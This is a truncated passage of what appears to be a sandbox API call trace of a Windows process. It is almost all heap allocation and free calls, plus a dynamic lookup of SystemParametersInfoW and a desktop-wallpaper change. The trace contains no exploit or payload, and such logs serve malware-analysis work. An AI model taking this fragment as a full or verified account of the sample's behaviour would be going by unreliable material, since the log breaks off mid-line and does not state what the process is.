hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0309.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0309.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0309.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0309.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0309.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0309.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0309.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0309.954] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0309.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0309.955] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0309.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0309.955] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0309.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0309.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0309.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0309.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0309.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0309.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0309.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0309.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0309.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0309.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0309.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0309.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0309.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0309.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0309.959] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0309.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0309.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0309.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0309.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0309.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0309.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0309.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0309.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0309.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0309.967] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0309.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0309.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0309.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0309.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0309.968] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0309.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0309.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0309.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0309.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0309.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0309.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0309.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0309.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0309.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0309.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0309.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0309.969] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0310.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0310.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0310.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0310.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0310.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0310.085] FreeLibrary (hLibModule=0x74f40000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0310.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 